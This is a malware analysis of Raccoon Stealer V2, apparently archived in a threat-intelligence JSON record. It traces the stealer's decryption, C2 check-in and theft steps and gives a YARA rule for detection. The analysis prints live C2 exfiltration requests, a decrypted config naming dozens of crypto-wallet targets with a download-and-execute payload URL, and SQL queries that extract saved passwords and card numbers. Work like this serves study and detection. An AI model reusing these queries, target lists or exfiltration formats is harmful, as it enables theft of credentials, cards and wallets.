{ "id": "e832c1f2-87f3-4704-a847-972b93692dc9", "created_at": "2026-04-06T00:07:51.487546Z", "updated_at": "2026-04-10T03:37:08.768701Z", "deleted_at": null, "sha1_hash": "783fd5b25678a528a3486a381f3860dec20d8495", "title": "The Trash Panda Reemerges from the Dumpster: Raccoon Stealer V2 – Malware Book Reports", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 121356, "plain_text": "The Trash Panda Reemerges from the Dumpster: Raccoon Stealer\r\nV2 – Malware Book Reports\r\nBy muzi View all posts\r\nArchived: 2026-04-05 22:59:13 UTC\r\nRaccoon Stealer has emerged from its hiatus, rewritten from the ground up in C/C++, with a new front-end, new\r\nback-end and new data stealing capabilities. Raccoon Stealer was previously sold as a Malware-as-a-Service\r\n(MaaS) until falling off the radar in March 2022. This shutdown was reportedly due to the loss of a lead developer\r\nof the project during the Russian invasion of Ukraine. After a few months of development, Raccoon Stealer is\r\nback, complete with all its shiny new features, for the price of $275 a month. Let’s [dumpster] dive into this new\r\nversion of Raccoon Stealer and see what it’s all about.\r\nFigure 1: Raccoon Stealer 2.0 Beta Testing Successful (source:\r\nhttps://www.bleepingcomputer.com/news/security/raccoon-stealer-is-back-with-a-new-version-to-steal-your-passwords/)\r\nTechnical Analysis\r\nMD5: 0cfa58846e43dd67b6d9f29e97f6c53e\r\nSHA1: 19d9fbfd9b23d4bd435746a524443f1a962d42fa\r\nSHA256: 022432f770bf0e7c5260100fcde2ec7c49f68716751fd7d8b9e113bf06167e03\r\nRaccoon Stealer 2.0 is advertised as lightweight, and it delivers, coming in at around 56 KB. The developers\r\npromise many new features, so let’s examine the execution flow step-by-step and see what this new version has to\r\noffer.\r\nStep 1: Resolve Libs\r\nThe malware kicks off execution by dynamically resolving Libraries and APIs required for later usage.\r\nFigure 2: Dynamically Resolve Libraries and APIs\r\nStep 2: Decrypt Strings\r\nAfter resolving the libraries and corresponding APIs required, the malware next decrypts its strings. These strings\r\nare base64 encoded and RC4 encrypted. To make analysis easier, I’ve written a Ghidra Script to decrypt these\r\nstrings and comment/label them appropriately.\r\nhttps://malwarebookreports.com/the-trash-panda-reemerges-from-the-dumpster-raccoon-stealer-v2/\r\nPage 1 of 14\n\nFigure 3: Base64 and RC4 Decrypt Strings\r\nStep 3: Decrypt Configuration [C2 Server(s)]\r\nNext, Raccoon Stealer proceeds to decrypt its configuration. In the sample analyzed, only one C2 was present,\r\nthough it appears to support multiple C2 servers in the code.\r\nFigure 4: Decrypt Configuration\r\nStep 4: Check Locale, Mutex and User Privs\r\nNow that everything has been loaded and decrypted, the malware starts checking for various information. First,\r\nthe malware checks GetUserDefaultLocaleName to ensure it does not match “RU” and exits if it does. Next, the\r\nmalware attempts to open an existing mutex object of 8724643052 . If successful, it exits to prevent running\r\nmultiple instances. Otherwise, the malware will open that mutex. (Note: Mutex is an unencrypted, hardcoded wide\r\nstring) Finally, the malware checks what privileges it is running under, checking to see if it is running as ( S-1-5-\r\n18 NT Authority\\System).\r\nFigure 5: Open or Create Mutex\r\nFigure 6: Check Privileges\r\nStep 5: Collect System Info, POST to C2\r\nRaccoon Stealer now collects some information on the system to provide to the C2. It begins by reading the\r\nmachine guid from HKLM\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid.\r\nFigure 7: Get Machine Guid\r\nNext, it gets the username via ADVAPI32.dll::GetUserNameW .\r\nFigure 8: Get Username\r\nFinally, it concatenates the results of the data.\r\nFigure 9: Concatenated Check-in Info to Send to C2\r\nmachineId=\u003cmachine_id\u003e|\u003cUSERNAME\u003e\u0026config_id=\u003cconfig_rc4_key\u003e\r\nhttps://malwarebookreports.com/the-trash-panda-reemerges-from-the-dumpster-raccoon-stealer-v2/\r\nPage 2 of 14\n\nOnce basic system information has been collected, Raccoon Stealer sends this information to the C2 server. Note\r\nthe User-Agent: record and that the data is unencrypted and sent over HTTP.\r\nFigure 10: Send Data to C2 Server\r\nPOST / HTTP/1.1\r\nAccept: */*\r\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\r\nUser-Agent: record\r\nHost: 51.195.166.184\r\nContent-Length: 95\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nData Raw: 6d 61 63 68 69 6e 65 49 64 3d 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d\r\nData Ascii: machineId=\u003cmachine_id\u003e|\u003cusername\u003e\u0026configId=\u003cconfig_rc4_key\u003e\r\nStep 6: Retrieve Config From C2\r\nIf the POST to the C2 server is successful, the C2 server returns the configuration, which includes URLs to\r\ndownload the DLL dependencies and the stealer configuration.\r\nNote: The C2 for the sample I analyzed was down, so I modified the sample to use a new C2 server I found and\r\npatched/modified the config for my sample to work correctly. I did manage to get more config data as well as a\r\npayload for Raccoon to download and execute.\r\nlibs_nss3:hxxp://94.158.247[.]24/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll\r\nlibs_msvcp140:hxxp://94.158.247[.]24/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll\r\nlibs_vcruntime140:http://94.158.247[.]24/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll\r\nlibs_mozglue:hxxp://94.158.247[.]24/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll\r\nlibs_freebl3:hxxp://94.158.247[.]24/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll\r\nlibs_softokn3:hxxp://94.158.247[.]24/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll\r\news_meta_e:ejbalbakoplchlghecdalmeeeajnimhm;MetaMask;Local Extension Settings\r\news_tronl:ibnejdfjmmkpcnlpebklmnkoeoihofec;TronLink;Local Extension Settings\r\nlibs_sqlite3:hxxp://94.158.247[.]24/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll\r\news_bsc:fhbohimaelbohpjbbldcngcnapndodjp;BinanceChain;Local Extension Settings\r\news_ronin:fnjhmkhhmkbjkkabndcnnogagogbneec;Ronin;Local Extension Settings\r\nwlts_exodus:Exodus;26;exodus;*;*partitio*,*cache*,*dictionar*\r\nwlts_atomic:Atomic;26;atomic;*;*cache*,*IndexedDB*\r\nwlts_jaxxl:JaxxLiberty;26;com.liberty.jaxx;*;*cache*\r\nwlts_binance:Binance;26;Binance;*app-store.*;-\r\nwlts_coinomi:Coinomi;28;Coinomi\\Coinomi\\wallets;*;-\r\nwlts_electrum:Electrum;26;Electrum\\wallets;*;-\r\nwlts_elecltc:Electrum-LTC;26;Electrum-LTC\\wallets;*;-\r\nwlts_elecbch:ElectronCash;26;ElectronCash\\wallets;*;-\r\nhttps://malwarebookreports.com/the-trash-panda-reemerges-from-the-dumpster-raccoon-stealer-v2/\r\nPage 3 of 14\n\nwlts_guarda:Guarda;26;Guarda;*;*cache*,*IndexedDB*\r\nwlts_green:BlockstreamGreen;28;Blockstream\\Green;*;cache,gdk,*logs*\r\nwlts_ledger:Ledger Live;26;Ledger Live;*;*cache*,*dictionar*,*sqlite*\r\news_ronin_e:kjmoohlgokccodicjjfebfomlbljgfhk;Ronin;Local Extension Settings\r\news_meta:nkbihfbeogaeaoehlefnkodbefgpgknn;MetaMask;Local Extension Settings\r\nsstmnfo_System Info.txt:System Information:\r\n|Installed applications:\r\nlibs_nssdbm3:hxxp://94.158.247[.]24/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nssdbm3.dll\r\nwlts_daedalus:Daedalus;26;Daedalus Mainnet;*;log*,*cache,chain,dictionar*\r\nwlts_mymonero:MyMonero;26;MyMonero;*;*cache*\r\nwlts_xmr:Monero;5;Monero\\\\wallets;*.keys;-\r\nwlts_wasabi:Wasabi;26;WalletWasabi\\\\Client;*;*tor*,*log*\r\news_metax:mcohilncbfahbmgdjkbpemcciiolgcge;MetaX;Local Extension Settings\r\news_xdefi:hmeobnfnfcmdkdcmlblgagmfpfboieaf;XDEFI;IndexedDB\r\news_waveskeeper:lpilbniiabackdjcionkobglmddfbcjo;WavesKeeper;Local Extension Settings\r\news_solflare:bhhhlbepdkbapadjdnnojkbgioiodbic;Solflare;Local Extension Settings\r\news_rabby:acmacodkjbdgmoleebolmdjonilkdbch;Rabby;Local Extension Settings\r\news_cyano:dkdedlpgdmmkkfjabffeganieamfklkm;CyanoWallet;Local Extension Settings\r\news_coinbase:hnfanknocfeofbddgcijnmhnfnkdnaad;Coinbase;IndexedDB\r\news_auromina:cnmamaachppnkjgnildpdmkaakejnhae;AuroWallet;Local Extension Settings\r\news_khc:hcflpincpppdclinealmandijcmnkbgn;KHC;Local Extension Settings\r\news_tezbox:mnfifefkajgofkcjkemidiaecocnkjeh;TezBox;Local Extension Settings\r\news_coin98:aeachknmefphepccionboohckonoeemg;Coin98;Local Extension Settings\r\news_temple:ookjlbkiijinhpmnjffcofjonbfbgaoc;Temple;Local Extension Settings\r\news_iconex:flpiciilemghbmfalicajoolhkkenfel;ICONex;Local Extension Settings\r\news_sollet:fhmfendgdocmcbmfikdcogofphimnkno;Sollet;Local Ex\r\ntension Settings\r\news_clover:nhnkbkgjikgcigad\r\nomkphalanndcapjk;CloverWallet;Local Extension Settings\r\news_polymesh:jojhfeoedkpkglbfimdfabpdfjaoolaf;PolymeshWallet;Local Extension Settings\r\news_neoline:cphhlgmgameodnhkjdmkpanlelnlohao;NeoLine;Local Extension Settings\r\news_keplr:dmkamcknogkgcdfhhbddcghachkejeap;Keplr;Local Extension Settings\r\news_terra_e:ajkhoeiiokighlmdnlakpjfoobnjinie;TerraStation;Local Extension Settings\r\news_terra:aiifbnbfobpmeekipheeijimdpnlpgpp;TerraStation;Local Extension Settings\r\news_liquality:kpfopkelmapcoipemfendmdcghnegimn;Liquality;Local Extension Settings\r\news_saturn:nkddgncdjgjfcddamfgcmfnlhccnimig;SaturnWallet;Local Extension Settings\r\news_guild:nanjmdknhkinifnkgdcggcfnhdaammmj;GuildWallet;Local Extension Settings\r\news_phantom:bfnaelmomeimhlpmgjnjophhpkkoljpa;Phantom;Local Extension Settings\r\news_tronlink:ibnejdfjmmkpcnlpebklmnkoeoihofec;TronLink;Local Extension Settings\r\news_brave:odbfpeeihdkbihmopkbjmoonfanlbfcl;Brave;Local Extension Settings\r\news_meta_e:ejbalbakoplchlghecdalmeeeajnimhm;MetaMask;Local Extension Settings\r\news_ronin_e:kjmoohlgokccodicjjfebfomlbljgfhk;Ronin;Local Extension Settings\r\news_mewcx:nlbmnnijcnlegkjjpcfjclmcfggfefdm;MEW_CX;Sync Extension Settings\r\news_ton:cgeeodpfagjceefieflmdfphplkenlfk;TON;Local Extension Settings\r\news_goby:jnkelfanjkeadonecabehalmbgpfodjm;Goby;Local Extension Settings\r\news_ton_ex:nphplpgoakhhjchkkhmiggakijnkhfnd;TON;Local Ext\r\nension Settings\r\nhttps://malwarebookreports.com/the-trash-panda-reemerges-from-the-dumpster-raccoon-stealer-v2/\r\nPage 4 of 14\n\news_Cosmostation:fpkhgmpbidmiogeglndfbkegfdlnajnf;Cosmostation;Local Extension Settings\r\news_bitkeep:jiidiaalihmmhddjgbnbgdfflelocpak;BitKeep;Local Extension Settings\r\news_gamestopext:pkkjjapmlcncipeecdmlhaipahfdphkd;GameStop;Local Extension Settings\r\news_stargazer:pgiaagfkgcbnmiiolekcfmljdagdhlcm;Stargazer;Local Extension Settings\r\news_clv:nhnkbkgjikgcigadomkphalanndcapjk;CloverWallet;Local Extension Settings\r\news_jaxxlibertyext:cjelfplplebdjjenllpjcblmjkfcffne;JaxxLibertyExtension;Local Extension Settings\r\nscrnsht_Screenshot.jpeg:1\r\ntlgrm_Telegram:Telegram Desktop\\tdata|*|*emoji*,*user_data*,*tdummy*,*dumps*\r\ngrbr_txt:%USERPROFILE%\\Desktop\\|*.txt|*windows*,*recycle*|100|1|1|files\r\ngrbr_sdk:%DSK235%\\|*ledger*,*trezor*,*safepal*,*metamask*|-|15|0|0|files\r\nldr_1:hxxps://bitbucket[.]org/reaXon112233/12333333/downloads/1[.]exe|%APPDATA%\\|exe\r\ntoken:\u003ctoken_id\u003e\r\nField Description\r\nlibs_\u003cfilename\u003e DLL dependency filename and address to download it from\r\news_\u003ctarget_software\u003e Browser-based crypto wallet extensions\r\nwlts_\u003ctarget_software\u003e Crypto wallets\r\nsstmnnfo_\u003cfilename\u003e\r\nString(s) used to structure system info data collected and sent to C2\r\nserver\r\nscrnsht_\u003cfilename\u003e Filename for the screenshot\r\ntlgrm_\u003ctarget_items\u003e Configuration for what data to collect from Telegram\r\ngrbr_\u003ctarget_data) Configuration data to target on local drives\r\nldr_ \u003ctarget\u003e\r\nOptional field to have Raccoon download and execute additional\r\npayload\r\ntoken\r\nUnique ID for the bot used to post data to the C2\r\nhttp://\u003cc2\u003e/\u003ctoken\u003e\r\nFigure 11: Raccoon Stealer Configuration Breakdown\r\nStep 7: Download and Load DLL Dependencies\r\nAfter receiving its configuration, Raccoon Stealer parses out the libs_ field, which contains the DLL filename\r\nand the download address. Next, it loops through and downloads the following files to the path `C:\\Users\\\r\n\u003cusername\u003e\\AppData\\LocalLow\r\nnss3.dll\r\nmsvcp140.dll\r\nvcruntime140.dll\r\nmozglue.dll\r\nhttps://malwarebookreports.com/the-trash-panda-reemerges-from-the-dumpster-raccoon-stealer-v2/\r\nPage 5 of 14\n\nfreebl3.dll\r\nsoftokn3.dll\r\nsqlite3.dll\r\nnssdbm3.dll\r\nFigure 12: Download DLL Dependencies\r\nStep 8: Fingerprint System, POST to C2\r\nAfter downloading the DLLs, Raccoon generates a URL based on its unique token. This token is used as the path\r\nfor all future POST requests so that the C2 server can keep track of the infected clients information. Next, it\r\ncollects detailed system information (sstmnfo_ in the config) about the infected device and sends it off to the C2.\r\nUser CID\r\nTimeZone\r\nOS Version\r\nArchitecture\r\nCPU Info\r\nRAM Info\r\nDisplay Devices\r\nInstalled Applications\r\nFigure 13: Enumerate SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall to Collect\r\nInstalled Applications\r\nPOST /\u003ctoken\u003e HTTP/1.1\r\nAccept: */*\r\nContent-Type: multipart/form-data; boundary=\u003crandom string\u003e\r\nUser-Agent: record\r\nHost: 51.195.166[.]175\r\nContent-Length: 2463\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n--\u003crandom string\u003e\r\nContent-Disposition: form-data; name=\"file\"; filename=\"System Info.txt\"\r\nContent-Type: application/x-object\r\nSystem Information:\r\n- Locale: English\r\n- Time zone:\r\n- OS: Windows 10 Pro\r\n- Architecture: x64\r\n- CPU: Intel Core Processor (Broadwell)X\r\n (2 cores)\r\nhttps://malwarebookreports.com/the-trash-panda-reemerges-from-the-dumpster-raccoon-stealer-v2/\r\nPage 6 of 14\n\n- RAM: 4095 MB\r\n- Display size: 1280x720\r\n- Display Devices:\r\n0) Microsoft Basic Display Adapter\r\nInstalled applications:\r\n7-Zip 19.00 (x64)\r\nMozilla Firefox 75.0 (x64 en-US)\r\nMozilla Maintenance Service 75.0\r\nMicrosoft Office Professional Plus 2016 - en-us 16.0.12527.20482\r\nVLC media player 3.0.6\r\nMicrosoft Visual C++ 2010 x64 Redistributable - 10.0.40219\r\nJava 8 Update 66 (64-bit) 8.0.660.17\r\nMicrosoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030\r\nMicrosoft Visual C++ 2013 x64 Additional Runtime - 12.0.40660\r\nMicrosoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161\r\nJava SE Development Kit 8 Update 66 (64-bit) 8.0.660.17\r\nMicrosoft Visual C++ 2022 X64 Minimum Runtime - 14.30.30704\r\nMicrosoft Visual C++ 2022 X64 Additional Runtime - 14.30.30704\r\nOffice 16 Click-to-Run Licensing Component 16.0.12527.20482\r\nOffice 16 Click-to-Run Extensibility Component 16.0.12527.20482\r\nOffice 16 Click-to-Run Localization Component 16.0.12527.20482\r\nMicrosoft Visual C++ 2013 x64 Minimum Runtime - 12.0.40660\r\nMicrosoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030\r\nGoogle Chrome 89.0.4389.114\r\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.\r\n--\u003crandom string\u003e\r\nStep 9: Steal All The Data! (…POST to C2)\r\nFinally, Raccoon gets down to business and starts doing what it does best – steal all the data. Raccoon targets all\r\nthe typical info-stealer related data, such as browser data (Cookies, CC info, Autofill, User Profile, Credentials,\r\netc.) as well as what is designated in the configuration received earlier. The Raccoon Stealer data stealing routine\r\nfollow these steps:\r\n1. Steal browser information including autofill cookies/password information and credit card data utilizing\r\nsqlite3.dll\r\n2. Steal data from Firefox using mozglue3.dll such as logins.json, cookies and history\r\n3. Steal crypto wallets, both traditional (wlts_) and browser extensions (ews_) designated in configuration\r\n4. Searches filesystem for wallet.dat to steal\r\n5. Optional file grabber for items listed in configuration, if configured\r\n6. Optional telegram stealer for data listed in configuration, if configured\r\n7. Optional screenshot grabber, if configured\r\n8. Optional loader functionality, if configured (can run local or download and execute remote payloads)\r\nhttps://malwarebookreports.com/the-trash-panda-reemerges-from-the-dumpster-raccoon-stealer-v2/\r\nPage 7 of 14\n\nFigure 14: Stealer Functionality\r\nBelow are a few examples of data stealing as well as an example of stolen data being exfiltrated.\r\nFigure 15: Steal Chrome Login Data\r\nFigure 16: Example of Chrome Data Targeted by Raccoon Stealer\r\nPOST /\u003ctoken\u003e HTTP/1.1\r\nAccept: */*\r\nContent-Type: multipart/form-data; boundary=\u003crandom string\u003e\r\nUser-Agent: record\r\nHost: 51.195.166[.]175\r\nContent-Length: 598\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nContent-Disposition: form-data; name=\"file\"; filename=\"\\cookies.txt\"\r\nContent-Type: application/xobject\r\n--\u003crandom string\u003e\r\n.google.comTRUE/TRUE13261761828952522NIDdjEwnsz88lgvWAEZj09hSgVlvT1ii6ETMk1LVWQNOCL/b+j6SI6F5DTJDV9/40nSckdtNqAi\r\nStep 10: Execute Additional Payload(s)\r\nRaccoon Stealer V2 optionally supports execution of additional files, indicated by the ldr_ field. The\r\nconfiguration for the sample I analyzed contained the following ldr_ configuration:\r\nldr_1:hxxps://bitbucket[.]org/reaXon112233/12333333/downloads/1[.]exe|%APPDATA%\\|exe . As a remote\r\npayload was listed, Raccoon Stealer will download the file from the URL specified in the configuration to\r\nC:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\\u003c[a-zA-z0-9]{8}\u003e , and execute it.\r\nFigure 17: [Optional] Download and Execute Additional Payload(s)\r\nDetection: Yara Rule, Ghidra Script, Config Extractor/String Decryptor\r\nDisclaimer: None of these have really been tested against larger sample sets. I focused on this sample in particular.\r\nFeel free to open an issue on GitHub and I can update any of the following.\r\nYara Rule\r\nrule Raccoon_Stealer_V2: raccoon_stealer_v2\r\n{\r\n meta:\r\nhttps://malwarebookreports.com/the-trash-panda-reemerges-from-the-dumpster-raccoon-stealer-v2/\r\nPage 8 of 14\n\nauthor = \"muzi\"\r\ndate = \"2022-07-22\"\r\n description = \"Detects Raccoon Stealer V2 (unpacked)\"\r\n hash = \"022432f770bf0e7c5260100fcde2ec7c49f68716751fd7d8b9e113bf06167e03\"\r\n strings:\r\n \r\n // Simple Strings\r\n $s1 = \"Profile %d\" wide\r\n $s2 = \"Login Data\" wide\r\n $s3 = \"0Network\\\\Cookies\" wide\r\n $s4 = \"Web Data\" wide\r\n $s5 = \"*.lnk\" wide\r\n $s6 = \"\\\\ffcookies.txt\" wide\r\n $s7 = \" %s %s\" wide\r\n $s8 = \"wallet.dat\" wide\r\n $s9 = \"S-1-5-18\" wide // malware checks if running as system\r\n /*\r\n LAB_0040878a XREF[1]: 004087be(j)\r\n 0040878a 8b c3 MOV EAX,EBX\r\n 0040878c 8b 0c 9f MOV this,dword ptr [EDI + EBX*0x4]\r\n 0040878f 99 CDQ\r\n 00408790 f7 7d fc IDIV dword ptr [EBP + local_8]\r\n 00408793 8b 45 10 MOV EAX,dword ptr [EBP + param_3]\r\n 00408796 0f be 04 02 MOVSX EAX,byte ptr [EDX + EAX*0x1]\r\n 0040879a 03 c1 ADD EAX,this\r\n 0040879c 03 f0 ADD ESI,EAX\r\n 0040879e 81 e6 ff AND ESI,0x800000ff\r\n 00 00 80\r\n 004087a4 79 08 JNS LAB_004087ae\r\n 004087a6 4e DEC ESI\r\n 004087a7 81 ce 00 OR ESI,0xffffff00\r\n ff ff ff\r\n 004087ad 46 INC ESI\r\n */\r\n // Decryption Routine\r\n $decryption_routine = {\r\n 8B (C0|C1|C2|C3|C5|C6|C7) [0-8]\r\n 8B ?? ?? [0-8]\r\n 99 [0-8]\r\n F7 7D ?? [0-8]\r\n 8B (45|4D|55|5D|6D|75|7D) ?? [0-8]\r\n 0F BE ?? ?? [0-8]\r\n 03 (C1|C2|C3|C5|C6|C7) [0-8]\r\nhttps://malwarebookreports.com/the-trash-panda-reemerges-from-the-dumpster-raccoon-stealer-v2/\r\nPage 9 of 14\n\n03 (F0|F1|F2|F3|F5|F6|F7) [0-8]\r\n 81 E6 ?? ?? ?? ?? [0-8]\r\n 7? ?? [0-8]\r\n 4E [0-8]\r\n 81 CE ?? ?? ?? ?? [0-8]\r\n 46\r\n }\r\n /*\r\n 00408130 8b 35 14 MOV ESI,dword ptr [DAT_0040e014]\r\n e0 40 00\r\n 00408136 57 PUSH EDI\r\n 00408137 50 PUSH EAX\r\n 00408138 ff 75 18 PUSH dword ptr [EBP + param_7]\r\n 0040813b ff d1 CALL param_1\r\n 0040813d 8b 7d d0 MOV EDI,dword ptr [EBP + local_34]\r\n 00408140 50 PUSH EAX\r\n 00408141 ff 75 18 PUSH dword ptr [EBP + param_7]\r\n 00408144 57 PUSH EDI\r\n 00408145 ff d6 CALL ESI\r\n 00408147 85 c0 TEST EAX,EAX\r\n 00408149 74 24 JZ LAB_0040816f\r\n 0040814b be 50 c3 MOV ESI,0xc350\r\n 00 00\r\n 00408150 eb 0b JMP LAB_0040815d\r\n LAB_00408152 XREF[1]: 0040816d(j)\r\n 00408152 8b 45 e4 MOV EAX,dword ptr [EBP + local_20]\r\n 00408155 85 c0 TEST EAX,EAX\r\n 00408157 74 16 JZ LAB_0040816f\r\n 00408159 c6 04 18 00 MOV byte ptr [EAX + EBX*0x1],0x0\r\n LAB_0040815d XREF[1]: 00408150(j)\r\n 0040815d a1 fc e0 MOV EAX,[DAT_0040e0fc]\r\n 40 00\r\n 00408162 8d 4d e4 LEA param_1=\u003elocal_20,[EBP + -0x1c]\r\n 00408165 51 PUSH param_1\r\n 00408166 56 PUSH ESI\r\n 00408167 53 PUSH EBX\r\n 00408168 57 PUSH EDI\r\n 00408169 ff d0 CALL EAX\r\n 0040816b 85 c0 TEST EAX,EAX\r\n 0040816d 75 e3 JNZ LAB_00408152\r\n */\r\n // C2 Comms\r\n $c2_comms = {\r\n 8B 35 ?? ?? ?? ?? [0-8]\r\nhttps://malwarebookreports.com/the-trash-panda-reemerges-from-the-dumpster-raccoon-stealer-v2/\r\nPage 10 of 14\n\n(50|51|52|53|55|56|57) [0-8]\r\n (50|51|52|53|55|56|57) [0-8]\r\n FF 75 ?? [0-8]\r\n FF (D0|D1|D2|D3|D5|D6|D7) [0-8]\r\n 8B (45|4D|55|5D|6D|75|7D) ?? [0-8]\r\n (50|51|52|53|55|56|57) [0-8]\r\n FF 75 ?? [0-8]\r\n (50|51|52|53|55|56|57) [0-8]\r\n FF (D0|D1|D2|D3|D5|D6|D7) [0-8]\r\n 85 C0 [0-8]\r\n (E2|EB|72|74|75|7C) ?? [0-8]\r\n (B8|B9|BA|BB|BD|BE|BF) ?? ?? ?? ?? [0-8]\r\n (E2|EB|72|74|75|7C) ?? [0-8]\r\n 8B (45|4D|55|5D|6D|75|7D) ?? [0-8]\r\n 85 C0 [0-8]\r\n (E2|EB|72|74|75|7C) ?? [0-8]\r\n C6 ?? ?? ?? [0-8]\r\n A1 ?? ?? ?? ?? [0-8]\r\n 8D 4D ?? [0-8]\r\n (50|51|52|53|55|56|57) [0-8]\r\n (50|51|52|53|55|56|57) [0-8]\r\n (50|51|52|53|55|56|57) [0-8]\r\n (50|51|52|53|55|56|57) [0-8]\r\n FF ?? [0-8]\r\n 85 C0 [0-8]\r\n (E2|EB|72|74|75|7C)\r\n }\r\n condition:\r\n 6 of ($s*) or\r\n ($c2_comms and $decryption_routine)\r\n}\r\nGhidra Script\r\nConfiguration Extractor, String Decryptor\r\npython3 decrypt.py 022432f770bf0e7c5260100fcde2ec7c49f68716751fd7d8b9e113bf06167e03\r\nRaccoon Stealer Config:\r\nhxxp://51.195.166[.]184/\r\nRaccoon Stealer Decrypted Strings:\r\news_\r\ngrbr_\r\n%s TRUE %s %s %s %s %s\r\nhttps://malwarebookreports.com/the-trash-panda-reemerges-from-the-dumpster-raccoon-stealer-v2/\r\nPage 11 of 14\n\nURL:%s\r\nUSR:%s\r\nPASS:%s\r\n%d) %s\r\n- Locale: %s\r\n- OS: %s\r\n- RAM: %d MB\r\n- Time zone: %c%ld minutes from GMT\r\n- Display size: %dx%d\r\n%d\r\n- Architecture: x%d\r\n- CPU: %s (%d cores)\r\n- Display Devices:\r\n%s\r\nformhistory.sqlite\r\n*\r\n\\\r\n:\r\n%\r\n;\r\n_\r\n|\r\n\\*\r\nlogins.json\r\n\\autofill.txt\r\n\\cookies.txt\r\n\\passwords.txt\r\n---\r\n--\r\n*/*\r\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\r\nContent-Type: multipart/form-data; boundary=\r\nhttps://malwarebookreports.com/the-trash-panda-reemerges-from-the-dumpster-raccoon-stealer-v2/\r\nPage 12 of 14\n\nContent-Type: text/plain;\r\nUser Data\r\nwallets\r\nwlts_\r\nldr_\r\nsstmnfo_\r\ntoken:\r\nnss3.dll\r\nsqlite3.dll\r\nSOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\r\nPATH\r\nProductName\r\nsqlite3_prepare_v2\r\nsqlite3_open16\r\nsqlite3_close\r\nsqlite3_step\r\nsqlite3_finalize\r\nsqlite3_column_text16\r\nsqlite3_column_bytes16\r\nSELECT origin_url, username_value, password_value FROM logins\r\nSELECT host_key, path, is_secure , expires_utc, name, encrypted_value FROM cookies\r\nSELECT name, value FROM autofill\r\npera\r\nStable\r\nSELECT host, path, isSecure, expiry, name, value FROM moz_cookies\r\nSELECT fieldname, value FROM moz_formhistory\r\ncookies.sqlite\r\nmachineId=\r\n\u0026configId=\r\n\"encrypted_key\":\"\r\nstats_version\":\"\r\nContent-Type: application/x-object\r\nContent-Disposition: form-data; name=\"file\"; filename=\"\r\nGET\r\nPOST\r\nLow\r\nMachineGuid\r\nimage/jpeg\r\nGdiPlus.dll\r\nGdi32.dll\r\nGdiplusStartup\r\nGdipDisposeImage\r\nGdipGetImageEncoders\r\nGdipGetImageEncodersSize\r\nGdipCreateBitmapFromHBITMAP\r\nGdipSaveImageToFile\r\nBitBlt\r\nhttps://malwarebookreports.com/the-trash-panda-reemerges-from-the-dumpster-raccoon-stealer-v2/\r\nPage 13 of 14\n\nCreateCompatibleBitmap\r\nCreateCompatibleDC\r\nDeleteObject\r\nGetObjectW\r\nSelectObject\r\nSetStretchBltMode\r\nStretchBlt\r\nSELECT name_on_card, card_number_encrypted, expiration_month, expiration_year FROM credit_cards\r\nNUM:%s\r\nHOLDER:%s\r\nEXP:%s/%s\r\n\\CC.txt\r\nNSS_Init\r\nNSS_Shutdown\r\nPK11_GetInternalKeySlot\r\nPK11_FreeSlot\r\nPK11_Authenticate\r\nPK11SDR_Decrypt\r\nSECITEM_FreeItem\r\nhostname\":\"\r\n\",\"httpRealm\":\r\nencryptedUsername\":\"\r\n\",\"encryptedPassword\":\"\r\n\",\"guid\":\r\nProfiles\r\nSource: https://malwarebookreports.com/the-trash-panda-reemerges-from-the-dumpster-raccoon-stealer-v2/\r\nhttps://malwarebookreports.com/the-trash-panda-reemerges-from-the-dumpster-raccoon-stealer-v2/\r\nPage 14 of 14", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://malwarebookreports.com/the-trash-panda-reemerges-from-the-dumpster-raccoon-stealer-v2/" ], "report_names": [ "the-trash-panda-reemerges-from-the-dumpster-raccoon-stealer-v2" ], "threat_actors": [ { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df", "created_at": "2023-01-06T13:46:38.402513Z", "updated_at": "2026-04-10T02:00:02.959797Z", "deleted_at": null, "main_name": "Sandworm", "aliases": [ "IRIDIUM", "Blue Echidna", "VOODOO BEAR", "FROZENBARENTS", "UAC-0113", "Seashell Blizzard", "UAC-0082", "APT44", "Quedagh", "TEMP.Noble", "IRON VIKING", "G0034", "ELECTRUM", "TeleBots" ], "source_name": "MISPGALAXY:Sandworm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad", "created_at": "2022-10-25T16:07:23.590051Z", "updated_at": "2026-04-10T02:00:04.679488Z", "deleted_at": null, "main_name": "Energetic Bear", "aliases": [ "ATK 6", "Blue Kraken", "Crouching Yeti", "Dragonfly", "Electrum", "Energetic Bear", "G0035", "Ghost Blizzard", "Group 24", "ITG15", 